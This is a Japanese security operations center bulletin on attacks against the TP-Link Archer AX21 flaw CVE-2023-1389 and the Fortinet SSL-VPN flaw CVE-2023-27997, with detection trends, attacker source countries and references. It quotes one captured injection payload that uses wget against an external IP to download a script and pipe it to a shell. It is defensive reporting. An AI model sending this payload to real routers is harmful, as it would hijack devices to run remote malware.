本サイトは、快適にご利用いただくためにクッキー(Cookie)を使用しております。
Cookieの使用に同意いただける場合は「同意する」ボタンを押してください。
なお本サイトのCookie使用については、「個人情報保護方針」をご覧ください。
TP-Link製ルータArcher AX21の脆弱性(CVE-2023-1389)を狙った攻撃
今月は、TP-Link製ルータArcher AX21の脆弱性を狙った攻撃が増加しました。本脆弱性は、2023年3月に公開されたコマンドインジェクションの脆弱性です。入力検証(サニタイズ処理)の不備により、認証なしで任意のコマンドを実行されてしまう恐れがあります。5月1日(月)に米国のサイバーセキュリティ・インフラストラクチャセキュリティ庁(CISA)が積極的に悪用されている脆弱性として、KEV(Known Exploited Vulnerabilities Catalog)へ追加し、注意喚起を促しています。
弊社SOCでは、5月31日(水)から6月上旬にかけて検知数が増加しました。下図は、今年5月から6月末までの本脆弱性を狙った攻撃数の推移です。
下図は、弊社SOCで実際に検知した攻撃のパケットペイロードです。POSTリクエストのボディ部において、不審なファイルをダウンロード後、実行を試みた通信となっています。
|
POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1 operation=write&country=$(id>`wget http://160[.]16[.]103[.]108/.p/e -O-|sh`) |
なお、6月におけるTP-Link製ルータの脆弱性(CVE-2023-1389)を狙った攻撃の攻撃元国の上位5件は以下の通りです。韓国、台湾、アメリカが上位を占めております。
| # | 国名 | 割合 |
| 1 | 韓国 | 19.8 % |
| 2 | 台湾 | 19.5 % |
| 3 | アメリカ | 15.0 % |
| 4 | 香港 | 7.4 % |
| 5 | ドイツ | 7.1 % |
参考情報
- TP-Link - Download for Archer AX21 V3
https://www.tp-link.com/us/support/download/archer-ax21/v3/#Firmware - CISA - Known Exploited Vulnerabilities Catalog
https://www.cisa.gov/known-exploited-vulnerabilities-catalog - CISA – CISA Adds Three Known Exploited Vulnerabilities to Catalog
https://www.cisa.gov/news-events/alerts/2023/05/01/cisa-adds-three-known-exploited-vulnerabilities-catalog - CVE-2023-1389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1389
Fortinet製品のSSL-VPN機能における脆弱性(CVE-2023-27997)について
Fortinet社は、6月13日(火)にFortinet製品のSSL-VPN機能における脆弱性(CVE-2023-27997)を公開しました。影響対象の製品は、FortiOSおよびFortiProxyとなっています。本脆弱性を悪用された場合、リモートから第三者に認証無しで任意のコードを実行されてしまう恐れがあります。弊社SOCでは、6月末までに本脆弱性を悪用する攻撃は検知しておりません。Fortinet社からは、本脆弱性を悪用する攻撃が報告されているため、影響対象の製品を使用している場合は、早急に対策されることをお勧めいたします。
参考情報
- Fortinet - FG-IR-23-097
https://www.fortiguard.com/psirt/FG-IR-23-097 - IPA - Fortinet 製 FortiOS および FortiProxy の脆弱性対策について(CVE-2023-27997)
https://www.ipa.go.jp/security/security-alert/2023/alert20230613.html
MBSD-SOC
おすすめ記事
